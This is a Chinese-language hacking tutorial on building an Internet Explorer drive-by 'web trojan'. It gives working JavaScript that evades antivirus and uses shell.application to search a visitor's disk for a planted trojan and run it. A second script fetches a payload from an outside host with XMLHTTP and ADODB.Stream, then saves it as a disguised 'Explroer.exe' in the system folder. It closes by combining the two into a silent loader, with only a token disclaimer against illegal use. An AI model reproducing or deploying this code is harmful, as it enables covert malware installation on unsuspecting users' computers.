首先要躲过杀毒软件的追杀，我们就不能利用ＷＳＨ和ＦＳＯ控件，因为只要利用了ＷＳＨ和ＦＳＯ控件就一定逃不脱“诺顿”的追杀，这可叫我们该如何是好？！别急，经过我的努力工作（说真的我也是在研究ＡＳＰ木马时偶然发现的灵感）终于我有找到了一个可以用的控件，那就是 shell.application，并且它可是经过了安全认证的，可以在“我的电脑”域中的网页中畅通无阻的执行，比ＷＳＨ和ＦＳＯ更容易得到执行权限（利用跨域漏洞即可），请看下面javascript代码：

　　保存为test.htm后打开看是否自动打开了记事本程序，而且不会象ＷＳＨ和ＦＳＯ那样出现是否允许运行的提示框，是不是有点兴趣啦？现在我们已可以运行所有已知路径的程序，但我们要求运行我们自己的木马程序，所以还要求把我们的木马程序下载到浏览者的电脑上并找出它的位置。我们一个个来解决：

　　１、下载木马程序到浏览者的电脑中

　　这一点可以有很多解决方法，比如我以前提到的ＷＩＮＤＯＷＳ帮助文件访问协议下载任意文件漏洞（its:），不过这次我们不用它，再教大家两个更好的下载方法：

　　例一：利用SCRIPT标签，代码如下：

　　注意此处的LANGUAGE属性可以为除javascript、VBScript、JScript以外的字符串,也可以是汉字，至于src的属性当然是你的木马程序的地址啦！因为现在免费空间出于安全考虑，多数不允许上传exe文件，我们可以变通一下把扩展名exe改为bat或pif、scr、com，同样可以运行。

　　例二：利用LINK标签，代码如下：

　　把代码放在标签中间，href属性值为木马程序的地址。

　　上面两个是我所知的最好的两种下载木马程序的方法，它们下载后的程序都保存在在ＩＥ临时目录Temporary Internet Files目录下的子目录中。

　　２、找出已下载到浏览者的脑中的木马程序路径

　　我们可以利用shell.application控件的一些属性和方法，并结合js的错误处理try{}catch(e){}finally{}语句,进行递归调用来找到木马程序的路径，代码如下：

function icyfoxlovelace(){
//得到ＷＩＮＤＯＷＳ系统目录和系统盘
url=document.location.href;
xtmu=url.substring(6,url.indexOf('\\',9)+1);
xtp=url.substr(6,3);

var shell=new ActiveXObject("shell.application");
var runbz=1;

//此处设置木马程序的大小，以字节为单位
//请把198201改为你的木马程序的实际大小
var exeSize=198201;

//设置木马程序名及扩展名(exe,com,bat,pif,scr)，用于判断是否是所下载的木马程序
//请把下面两行中的icyfox改为你的木马程序名，bat改为你的木马程序的扩展名
var a=/icyfox\[\d*\]\.bat/gi;
a.compile("icyfox\\[\\d*\\]\\.bat","gi");

var b=/[A-Za-z]:\\/gi;
b.compile("[A-Za-z]:\\\\","gi");//正则表达式,用于判断是否是盘的根目录

//下面的代码查找并运行木马程序
wjj(xtmu+"Temporary Internet Files\\");//Content.IE5\\
if(runbz)wjj(xtp+"Documents and Settings\\");
if(runbz)yp();

//在所有硬盘分区下查找并运行木马程序
function yp(){
try{
var c=new Enumerator(shell.namespace("c:\\").ParentFolder.Items());
for (;!c.atEnd();c.moveNext()){
if(runbz){if(b.test(c.item().path))wjj(c.item().path);}
else break;
}
}catch(e){}
}

//利用递归在指定目录(包括子目录)下查找并运行木马程序
function wjj(b){
try{
var c=new Enumerator(shell.namespace(b).Items());
for (;!c.atEnd();c.moveNext()){
if(runbz&&c.item().Size==exeSize&&a.test(c.item().path)){
var f=c.item().path;
var v=f.lastIndexOf('\\')+1;
try{
shell.namespace(f.substring(0,v)).items().item(f.substr(v)).invokeverb();//运行木马程序
runbz=0;
break;
}catch(e){}
}
if(!c.item().Size)wjj(c.item().path+"\\");//如果是子目录则递归调用
}
}catch(e){}
}

}

icyfoxlovelace();

　　请把以上代码保存为icyfox.js。
看到上面的东东是不是让你有了马上去实验的冲动，别急，如果你觉得win98没必要控制的话，还有更好的木马等着你，不知大家是否用过 win2000、winxp等系统中默认安装的ADODB.Stream及Microsoft.XMLHTTP控件？它们可是和 shell.application控件一样是经过了安全认证的，可以在“我的电脑”域中的网页中畅通无阻执行的好东西呀！请看下面的代码：

function icyfox(){
//设置下载后保存在系统目录下的木马程序名，我设的是不是很象Explorer.exe呀？呵呵
var name="Explroer.exe";
//设置你要下载的木马程序的地址（此处你可以把扩展名任意改，甚至没有扩展名也可以的)
//可以更好的躲过免费主页空间的上传限制
var url="http://www.godog.y365.com/wodemuma/icyfox.bat";
try{
var folder=document.location.href;
folder=folder.substring(6,folder.indexOf('\\',9)+1)+name;
var xml=new ActiveXObject("Microsoft.XMLHTTP");
xml.open("GET",url,false);
xml.send();
if(xml.status==200){
var ado=new ActiveXObject("ADODB.Stream");
ado.Type=1;
ado.Open();
ado.write(xml.responseBody);
ado.SaveToFile(folder,2);
ado.Close();
ado=null;
}
xml=null;
document.body.insertAdjacentHTML('AfterBegin','');
}
catch(e){}

}

icyfox();

　　把上面的的代码保存为icyfox.js替换上面保存的icyfox.js文件，同样利用上面的icyfox.htm来注入到“我的电脑”域中，呵呵你就偷这乐吧！

　　最后还请大家发挥以下DIY的能力把上面两种代码合二为一，我相信一个现阶段最最完美的ＩＥ网页木马就会在你手中诞生啦！是不是神不知鬼不觉？

　　提示代码如下：
try{new ActiveXObject("ADODB.Stream");icyfox();}catch(e){icyfoxlovelace();}

注：任何人不得利用本文介绍内容做非法的事情。